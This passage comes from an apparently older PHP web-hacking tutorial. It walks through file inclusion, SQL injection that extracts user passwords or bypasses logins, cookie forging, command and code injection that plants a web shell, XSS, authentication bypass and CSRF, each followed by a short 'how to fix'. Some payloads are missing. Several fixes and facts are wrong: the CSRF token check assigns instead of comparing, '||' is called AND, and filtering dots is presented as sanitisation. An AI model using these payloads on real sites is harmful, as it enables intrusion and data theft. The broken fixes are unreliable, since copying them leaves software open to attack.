-------------------------------------

We can see that "url" variable is injectable.If the "url" variable is not set
(is empty) the script will include "step_welcome.php" else will include the
variable set by the attacker.

So if we do the following request :

http://127.0.0.1/install/install.php?url=../../../../../../etc/passwd

The "etc/passwd" file will be succesfully included.


4.2 - How to fix


Simple way : Don't allow special chars in variables.Simple way : filter the dot "."
Another way : Filter "/" , "\" and "." .


5) Local File Disclosure/Download


- Tips : Through this vulnerability you can read the content of files,not include.

Some functions which let you to read files :

file_get_contents — Reads entire file into a string
readfile — Outputs a file
file — Reads entire file into an array
fopen — Opens file or URL
highlight_file — Syntax highlighting of a file.Prints out or returns a syntax
highlighted version of the code contained in filename using the
colors defined in the built-in syntax highlighter for PHP.
show_source — Alias of highlight_file()


5.0 - Basic example


- Code snippet from test.php

--------------------------------------
$pagina=$_GET['pagina'];
readfile($pagina);
?>
--------------------------------------

The readfile() function will read the content of the specified file.So if we do the following request :

http://127.0.0.1/test.php?pagina=../../../../../../etc/passwd

The content of etc/passwd will be outputed NOT included.


5.1 - Simple example


- Code snippet from download.php

-----------------------------------------------------------------------------------
$file = $_SERVER["DOCUMENT_ROOT"]. $_REQUEST['file'];
header("Pragma: public");
header("Expires: 0");
header("Cache-Control: must-revalidate, post-check=0, pre-check=0");

header("Content-Type: application/force-download");
header( "Content-Disposition: attachment; filename=".basename($file));

//header( "Content-Description: File Transfer");
@readfile($file);
die();
-----------------------------------------------------------------------------------

The "file" variable is unsecure.We see in first line that it is requested by $_REQUEST method.
And the file is disclosed by readfile() function.So we can see the content of an arbitrary file.
If we make the following request :

http://127.0.0.1/download.php?file=../../../../../../etc/passwd

So we can succesfully read the "etc/passwd" file.


5.2 - How to fix


Simple way : Don't allow special chars in variables.Simple way : filter the dot "."
Another way : Filter "/" , "\" and "." .


6) SQL Injection


- Tips : If the user have file privileges you can read files.
If the user have file privileges and you find a writable directory and magic_quotes_gpc = off
you can upload you code into a file.


6.0 - Basic example


- Code snippet from test.php

----------------------------------------------------------------------------------
$id = $_GET['id'];
$result = mysql_query( "SELECT name FROM members WHERE id = '$id'");
?>
----------------------------------------------------------------------------------

The "id" variable is not filtered.We can inject our SQL code in "id" variable.Example :

http://127.0.0.1/test.php?id=1+union+all+select+1,null,load_file('etc/passwd'),4--

And we get the "etc/passwd" file if magic_quotes = off ( escaping ' ) and users have
file privileges.


6.1 - Simple example


- Code snippet from house/listing_view.php

-----------------------------------------------------------------------------------------------------------------------------
$id = $_GET['itemnr'];
require_once($home."mysqlinfo.php");
$query = "SELECT title, type, price, bedrooms, distance, address, phone, comments, handle, image from Rentals where id=$id";
$result = mysql_query($query);
if(mysql_num_rows($result)){
$r = mysql_fetch_array($result);
-----------------------------------------------------------------------------------------------------------------------------

We see that "id" variable value is the value set for "itemnr" and is not filtered in any way.
So we can inject our code.Lets make a request :

http://127.0.0.1/house/listing_view.php?itemnr=null+union+all+select+1,2,3,concat(0x3a,email,password),5,6,7,8,9,10+from+users--

And we get the email and the password from the users table.


6.2 - SQL Injection Login Bypass


- Code snippet from /admin/login.php

------------------------------------------------------------------------------------------------------------------------------
$postbruger = $_POST['username'];
$postpass = md5($_POST['password']);
$resultat = mysql_query("SELECT * FROM " . $tablestart . "login WHERE brugernavn = '$postbruger' AND password = '$postpass'")
or die("

" . mysql_error() . "

\n");
------------------------------------------------------------------------------------------------------------------------------

The variables isn't properly checked.We can bypass this login.Lets inject the following username and password :

username : admin ' or ' 1=1
password : sirgod

We logged in.Why?Look,the code will become

---------------------------------------------------------------------------------------------------------------------------------
$resultat = mysql_query("SELECT * FROM " . $tablestart . "login WHERE brugernavn = 'admin' ' or ' 1=1 AND password = 'sirgod'")
---------------------------------------------------------------------------------------------------------------------------------

Login bypassed.The username must be an existent username.


6.3 - How to fix


Simple way : Don't allow special chars in variables.For numeric variables
use (int) ,example $id=(int)$_GET['id'];
Another way : For non-numeric variables : filter all special chars used in
SQLI : - , . ( ) ' " _ + / *


7) Insecure Cooke Handling


- Tips : Write the code in the URLbar,don't use a cookie editor for this.


7.0 - Basic example


- Code snippet from test.php

---------------------------------------------------------------
if($_POST['password'] == $thepass) {
setcookie("is_user_logged","1");
} else { die("Login failed!"); }
............ etc .................
if($_COOKIE['is_user_logged']=="1")
{ include "admin.php"; else { die('not logged'); }
---------------------------------------------------------------

Something interesting here.If we set to the "is_user_logged" variable
from cookie value "1" we are logged in.Example :

javascript:document.cookie = "is_user_logged=1; path=/";

So practically we are logged in,we pass the check and we can access the admin panel.


7.1 - Simple example


- Code snippet from admin.php

----------------------------------------------------------------
if ($_COOKIE[PHPMYBCAdmin] == '') {
if (!$_POST[login] == 'login') {
die("Please Login:

name=password> type=submit>

");
} elseif($_POST[password] == $bcadminpass) {
setcookie("PHPMYBCAdmin","LOGGEDIN", time() + 60 * 60);
header("Location: admin.php"); } else { die("Incorrect"); }
}
----------------------------------------------------------------

Code looks exploitable.We can set a cookie value that let us to bypass the login
and tell to the script that we are already logged in.Example :

javascript:document.cookie = "PHPMYBCAdmin=LOGGEDIN; path=/";document.cookie = "1246371700; path=/";

What is 1246371700? Is the current time() echo'ed + 360.


7.2 - How to fix


Simple way : The most simple and eficient way : use SESSIONS .


8) Remote Command Execution


- Tips : If in script is used exec() you can't see the command output(but the command is executed)
until the result isn't echo'ed from script.
You can use AND operator ( || ) if the script execute more than one command .

In PHP are some functions that let you to execute commands :

exec — Execute an external program
passthru — Execute an external program and display raw output
shell_exec — Execute command via shell and return the complete output as a string
system — Execute an external program and display the output


8.0 - Basic example

- Code snippet from test.php

---------------------------------
$cmd=$_GET['cmd'];
system($cmd);
?>
---------------------------------

So if we make the following request :

http://127.0.0.1/test.php?cmd=whoami

The command will be executed and the result will be outputed.


8.1 - Simple example


- Code snippet from dig.php

-------------------------------------------------------------------------------------------
$status = $_GET['status'];
$ns = $_GET['ns'];
$host = $_GET['host'];
$query_type = $_GET['query_type']; // ANY, MX, A , etc.
$ip = $_SERVER['REMOTE_ADDR'];
$self = $_SERVER['PHP_SELF'];
........................ etc ........................
$host = trim($host);
$host = strtolower($host);
echo("Executing : dig @$ns $host $query_type
");
echo '

';

	        system ("dig @$ns $host $query_type");

			-------------------------------------------------------------------------------------------



			 The "ns" variable is unfiltered and can be specified by the attacker.An attacker can use any command

           that he want through this variable.

		   

		     Lets make a request :

			 

			  http://127.0.0.1/dig.php?ns=whoam&host=sirgod.net&query_type=NS&status=digging

			  

			 The injection will fail.Why?The executed command will be : dig whoami sirgod.com NS and

			will not work of course.Lets do something a little bit tricky.We have the AND operator

			( || ) and we will use it to separe the commands.Example :

		 

		      http://127.0.0.1/dig.php?ns=||whoami||&host=sirgod.net&query_type=NS&status=digging

	  

	        Our command will be executed.The command become "dig ||whoami|| sirgod.net NS".

			



       8.2 - Advanced example

	   

	   

	      - Code snippet from add_reg.php

		  

		  -------------------------------------------------------

		  $user = $_POST['user'];

		  $pass1 = $_POST['pass1'];

		  $pass2 = $_POST['pass2'];

		  $email1 = $_POST['email1'];

		  $email2 = $_POST['email2'];

		  $location = $_POST['location'];

		  $url = $_POST['url'];

		  $filename = "./sites/".$user.".php";

		  ...................etc......................

		  $html = "		  \$regdate = \"$date\";

		  \$user = \"$user\";

		  \$pass = \"$pass1\";

		  \$email = \"$email1\";

		  \$location = \"$location\";

		  \$url = \"$url\";

		  ?>";

		  $fp = fopen($filename, 'a+');

		  fputs($fp, $html) or die("Could not open file!");

		  -------------------------------------------------------

       	 

		  We can see that the script creates a php file in "sites" directory( ourusername.php ).

          The script save all the user data in that file so we can inject our evil code into one

         field,I choose the "location" variable.

		 

		  So if we register as an user with the location (set the "location" value) :

 

            



         the code inside sites/ourusername.php will become :

		 

           -------------------------------------------------

                      $regdate = "13 June 2009, 4:16 PM";

           $user = "pwned";

           $pass = "pwned";

           $email = "pwned@yahoo.com";

           $location = "";

           $url = "http://google.ro";

           ?>

		   -------------------------------------------------



          So we will get an parse error.Not good.We must inject a proper code to get the result that we want.

 

         Lets inject this code :

 

            \";?> 

         So the code inside sites/ourusername.php will become :

		 

           --------------------------------------------------------------

                      $regdate = "13 June 2009, 4:16 PM";

           $user = "pwned";

           $pass = "pwned";

           $email = "pwned@yahoo.com";

           $location = "";?>           $url = "http://google.ro";

           ?> 

		   --------------------------------------------------------------

 

         and we will have no error.Why?See the code :

 

 	      $location = "";?>		  

         Lets split it :

 

         -------------------------------

         $location = "";

         ?>

         

         		 -------------------------------



           We set the location value to "",close the first php tags,open the tags

          again,wrote our evil code,close the tags and open other and add a variable

          "xxx" because we dont want any error.I wrote that code because I want no 

          error,can be modified to be small but will give some errors(will not 

          stop us to execute commands but looks ugly).

		  

		 So if we make the following request :

		 

		    http://127.0.0.1/sites/ourusername.php?cmd=whoami

			

	     And our command will be succesfully executed.

		 

		 

	   8.3 - How to fix 

	   

	   

	        Simple way : Don't allow user input .

		    Another way : Use escapeshellarg() and escapeshellcmd() functions . 

		                 Example : $cmd=escapeshellarg($_GET'cmd']);

    

	

	 9) Remote Code Execution

	 

	    

		 - Tips : You must inject valid PHP code including terminating statements ( ; ) .

	 

	    

	   9.0 - Basic example

	   

	   

	      - Code snippet from test.php 

		  

		  -----------------------------------

		   		   $code=$_GET['code'];

		   eval($code); 

		   ?>

		   -----------------------------------

	       

	      The "eval" function evaluate a string as PHP code.So in this case we are able to execute 

		 our PHP code.Examples : 

		 

		    http://127.0.0.1/test.php?code=phpinfo();

			http://127.0.0.1/test.php?code=system(whoami);

			

		  And we will see the output of the PHP code injected by us.

		  

		  

	   9.1 - Simple example

	   

	   

	      - Code snippet from system/services/init.php

		  

		  ------------------------------------------------

		  $conf = array_merge($conf,$confweb);

		  }

		  @eval(stripslashes($_REQUEST['anticode']));

          if ( $_SERVER['HTTP_CLIENT_IP'] )

		  ------------------------------------------------

		  

		   We see that the "anticode" is requested by $_REQUEST method and the coder 

		  "secured" the input with "stripslashes" which is useless here,we don't need 

		  slashes to execute our php code only if we want to include a URL.So we can

		  inject our PHP code.Example : 

		  

		    http://127.0.0.1/test.php?anticode=phpinfo();

			

		  Great,injection done,phpinfo() result printed.No include because slashes are

		  removed,but we can use system() or another function to execute commands.

	   

	   

	   9.2 - How to fix 

	   

	         

            Simple way : Don't allow ";" and the PHP code will be invalid.

			Another way : Don't allow any special char like "(" or ")" etc.

			

			

	 10) Cross-Site Scripting

	 

	 

	     - Tips : You can use alot of vectors,can try alot of bypass methods,you cand

		        find them around the web.

				

				

	   10.0 - Basic example

	   

	   

	      - Code snippet from test.php

		  

		  ---------------------------------

		   		   $name=$_GET['name'];

		   print $name;

		   ?>

	       ---------------------------------

		   

		    The input is not filtered,an attacker can inject JavaScript code.Example :

	   

	           http://127.0.0.1/test.php?name=

			   

			A popup with XSS message will be displayed.JavaScript code succesfully executed.

			

			

	   10.1 - Another example

	   

	   

	      - Code snippet from test.php

		  

		   -------------------------------------------

		    		    $name=addslashes($_GET['name']);

		    print '';

		    ?>

		   -------------------------------------------

		   

		   Not an advanced example,only a bit complicated.

			

			http://127.0.0.1/test.php?name=">

			

		   Why this vector?We put " because we must close the " from the "name" atribut

		  of the "table" tag and > to close the "table" tag.Why String.fromCharCode?Because

		  we want to bypass addslashes() function.Injection done.

		  

		  

	   10.2 - Simple example 

	   

	      

		   - Code snippet from modules.php

		   

		   ---------------------------------------------------------------------------

		   if (isset($name)) {

		   .................... etc................

		   } else {

		   die("Le fichier modules/".$name."/".$mod_file.".php est inexistant");

		   ---------------------------------------------------------------------------

		   

		   The "name" variable is injectable,input is not filtered,so we can inject

		  with ease JavaScript code.Example :

		   

		        http://127.0.0.1/test.php?name=

				

				

	   10.3 - How to fix

	   

	   

	          Simple way : Use htmlentities() or htmlspecialchars() functions.

			              Example : $name=htmlentities($_GET['name']);

			  Another way : Filter all special chars used for XSS ( a lot ).

			              The best way is the first method.

						  

						  

	 11) Authentication Bypass	

	 

	 

	     - Tips : Look deep in the scripts,look in the admin directories,

		        maybe are not protected,also look for undefined variables 

				like "login" or "auth".

				

	   

	   11.0 - Basic example

	   

	       

		   I will provide a simple example of authentication bypass

		  via login variable.

		  

		   - Code snippet from test.php

		   

		   ---------------------------------

		   		   if ($logged==true) {

		   echo 'Logged in.'; }

		   else {

		   print 'Not logged in.';

		   }

		   ?>

		   ---------------------------------

		   

		    Here we need register_gloabals = on . I will talk about php.ini

		  settings a bit later in this tutorial.If we set the value of $logged

		  variable to 1 the if condition will be true and we are logged in.

		    Example : 

			

			  http://127.0.0.1/test/php?logged=1

			

		    And we are logged in.

		  

		  

	   11.1 - Via login variable

		  

		  

		 - Code snippet from login.php

		 

		 ------------------------------------------------------------------------------------

		 if ($login_ok)

		 {

		 $_SESSION['loggato'] = true;

		 echo "
$txt_pass_ok
";

		 echo"
$txt_view_entry | 

		 $txt_delete-$txt_edit | $txt_install

		 
";

		 }

		 ------------------------------------------------------------------------------------

		 

		  Lets see.If the "login_ok" variable is TRUE ( 1 ) the script set us a SESSION who

         tell to the script that we are logged in.So lets set the "login_ok" variable to TRUE.

		  Example : 

		  

		     http://127.0.0.1/login.php?login_ok=1

			 

		  Now we are logged in.

		  

		  

	   11.2 - Unprotected Admin CP

	   

	   

           You couln't belive this but some PHP scrips don't protect the admin

		  control panel : no login,no .htaccess,nothing.So we simply we go to 

		  the admin panel directory and we take the control of the website.

		   Example : 

		   

		      http://127.0.0.1/admin/files.php

			  

			We accessed the admin panel with a simple request.

			

			

	   11.3 - How to fix 

	  

	  

	      - Login variable bypass : Use a REAL authentication system,don't check the

		                          login like that,use SESSION verification.Example :

		   

		      if($_SESSION['logged']==1) {

			  echo 'Logged in'; }

			  else { echo 'Not logged in';

			  }

		  

		  - Unprotected Admin CP : Use an authentication system or use .htaccess to

		                          allow access from specific IP's or .htpasswd to 

								  request an username and a password for admin CP.

								  Example : 

								  

				.htaccess : 

				

				    order deny, allow

				    deny from all

				    allow from 127.0.0.1

				

				.htpasswd : 

				 

				    AuthUserFile /the/path/.htpasswd

				    AuthType Basic

				    AuthName "Admin CP"

				    Require valid-user

					

					and /the/path/.htpasswd

					

					sirgod:$apr1$wSt1u...$6yvagxWk.Ai2bD6s6O9iQ.

					

					

	 12) Insecure Permissions

	 

	 

	     Tips : Look deep into the files,look if the script request to be

		      logged in to do something,maybe the script don't request.

			    Watch out for insecure permissions,maybe you can do admin

			  things without login.

			  

			  

	   12.0 - Basic example

	   

	      

		  We are thinking at a script who let the admin to have a lookup in

		 the users database through a file placed in /admin directory.That 

		 file is named...hmmm : db_lookup.php.

		 

		  - Code snippet from admin/db_lookup.php

		  

		  --------------------------------------------

		  		  // Lookup in the database

		  readfile('protected/usersdb.txt');

		  ?>

		  --------------------------------------------

		  

		   Lets think.We cannot access the "protected" directory because

		  is .htaccess'ed.But look at this file,no logged-in check,nothing.

		  So if we acces : 

		  

		    http://127.0.0.1/admin/db_lookup.php

			

		  We can see the database.Remember,this is only an example created by 

		 me,not a real one,you can find this kind of vulnerabilities in scripts.

		 

		 

	   12.1 - Read the users/passwords

	   

	   

	      Oh yeah,some coders are so stupid.They save the usernames and passwords

		 in text files,UNPROTECTED.A simple example from a script : 

		 

		    http://127.0.0.1/userpwd.txt

			

		  And we read the file,the usernames and passwords are there.



	   

	   12.2 - Download Backups

		   



		    Some scripts have database backup functions,some are safe,some are not safe.

			I will show you a real script example : 

			

			 - Code snippet from /adminpanel/phpmydump.php

			 

			 --------------------------------------------------------------------------------

			 function mysqlbackup($host,$dbname, $uid, $pwd, $structure_only, $crlf) {  

			 $con=@mysql_connect("localhost",$uid, $pwd) or die("Could not connect");  

			 $db=@mysql_select_db($dbname,$con) or die("Could not select db");

			 .............................. etc ..........................

			  mysqlbackup($host,$dbname,$uname,$upass,$structure_only,$crlf);

			 --------------------------------------------------------------------------------

			 

			After a lof of code the function is called.I don't pasted the entire code

		  because is huge.I analyzed the script,no login required,no check,nothing.So

		  if we access the file directly the download of the backup will start.Example : 

		  

		      http://127.0.0.1/adminpanel/phpmydump.php

			  

		   Now we have the database backup saved in our computer.

		   

		  

       12.3 - INC files

		

		

		   Some scripts saves important data in INC files.Usually in INC files is PHP

		  code containing database configuration.The INC files can be viewed in 

		  browser even they contain PHP code.So a simple request will be enough to

		  access and read the file.Example : 

		  

		      http://127.0.0.1/inc/mysql.inc

			  

		   Now we have the database connection details.Look deep in scripts,is more

		  scripts who saves important data into INC files.

		

		   

	   12.4 - How to fix

		                   

		   

		    - Basic example : Check if the admin is logged in,if not,redirect.

			

			- Read the users/passwords : Save the records in a MySQL database

			                           or in a protected file/directory.

									   

		    - Download Backups : Check if the admin is logged in,if not,redirect.

			

			- INC files : Save the configuration in proper files,like .php or

			           protect the directory with an .htaccess file.

		     

	 

	 13) Cross Site Request Forgery

	 

	 

	    - Tips : Through CSRF you can change the admin password,is not

		       so inofensive.

			     Can be used with XSS,redirected from XSS.

	 

	 

	   13.0 - Basic example

	   

	      

		   - Code snippet from test.php 

		   

		   -----------------------------------------

		   		   check_auth();

		   if(isset($_GET['news']))

		   { unlink('files/news'.$news.'.txt'); }

		   else { 

		   die('File not deleted'); }

		   ?>

		   -----------------------------------------

		   

		    In this example you will see what is CSRF and how it works.In the "files" 

		   directory are saved the news written by the author.The news are saved like

		   "news1.txt","news2.txt" etc. So the admin can delete the news.The news that

		   he want to delete will be specified in "news" variable.If he want to delete

		   the news1.txt the value of "news" will be "1".We cannot execute this without

		   admin permissions,look,the script check if we are logged in.

		    I will show you an example.If we request : 

			

			   http://127.0.0.1/test.php?news=1

			   

			The /news/news1.txt file will be deleted.The script directly delete the file

		   without any notice.So we can use this to delete a file.All we need is to trick

		   the admin to click our evil link and the file specified by us in the "news" 

		   variable will be deleted.

		   

		   

	   13.1 - Simple example

	   

	   

	      In a way the codes below are included in the index.php file ,I

		 will not paste all the includes,there are a lot.

	   

           - Code snippet from includes/pages/admin.php



           --------------------------------------------------------------------

           if ($_GET['act'] == '') {

           include "includes/pages/admin/home.php";

           } else {

           include "includes/pages/admin/" . $_GET['act'] . ".php";

		   --------------------------------------------------------------------

		  

		  Here we can see how the "includes/pages/admin/members.php" is included in

		 this file.If "act=members" the file below will be included.

		   

	      

		   - Code snippet from includes/pages/admin/members.php

		   

		   ----------------------------------------------------------------------------------------------

 		   if ($_GET['func'] == 'delete') {

 		   $del_id = $_GET['id'];

 		   $query2121 = "select ROLE from {$db_prefix}members WHERE ID='$del_id'";

 		   $result2121 = mysql_query($query2121) or die("delete.php - Error in query: $query2121");

 		   while ($results2121 = mysql_fetch_array($result2121)) {

 		   $their_role = $results2121['ROLE'];

		   }

 		   if ($their_role != '1') {

           mysql_query("DELETE FROM {$db_prefix}members WHERE id='$del_id'") or die(mysql_error

           ()); 

		   ----------------------------------------------------------------------------------------------

		   

		   We can see here that if "func=delete" will be called by URL,the script will

		  delete from the database a user with the specified ID ( $id ) without any 

		  confirmation.Example : 

		  

		    http://127.0.0.1/index.php?page=admin&act=members&func=delete&id=4

			

		  The script check if the admin is logged in so if we trick the admin to click

		 our evil link the user who have the specified ID in the database will be deleted

		 without any confirmation.

				   

	

	   13.2 - How to fix	

	   

	   

	      - Simple way : Use tokens.At each login,generate a random token and save it

		                in the session.Request the token in URL to do administrative 

						actions,if the token missing or is wrong,don't execute the

						action.I will show you only how to to check if the token 

                                                is present and is correct.Example :



								 -------------------------------------------------------					

								  								  check_auth();

								  if(isset($_GET['news']) && $token=$_SESSION['token'])

								  { unlink('files/news'.$news.'.txt'); }

								  else { 

								  die('Error.'); }

								  ?>

								  -------------------------------------------------------

								  

						The request will look like this one : 

						

						    http://127.0.0.1/index.php?delete=1&token=[RANDOM_TOKEN]

								  

						So this request will be fine,the news will be deleted.

										

			

		  - Another way : Do some complicated confirmations or request a password

		                 to do administrative actions.





         14) Shoutz



		 

              Shoutz to all www.insecurity.ro & www.h4cky0u.org members.If you have some suggestions or 

            questions just email me.		

Read More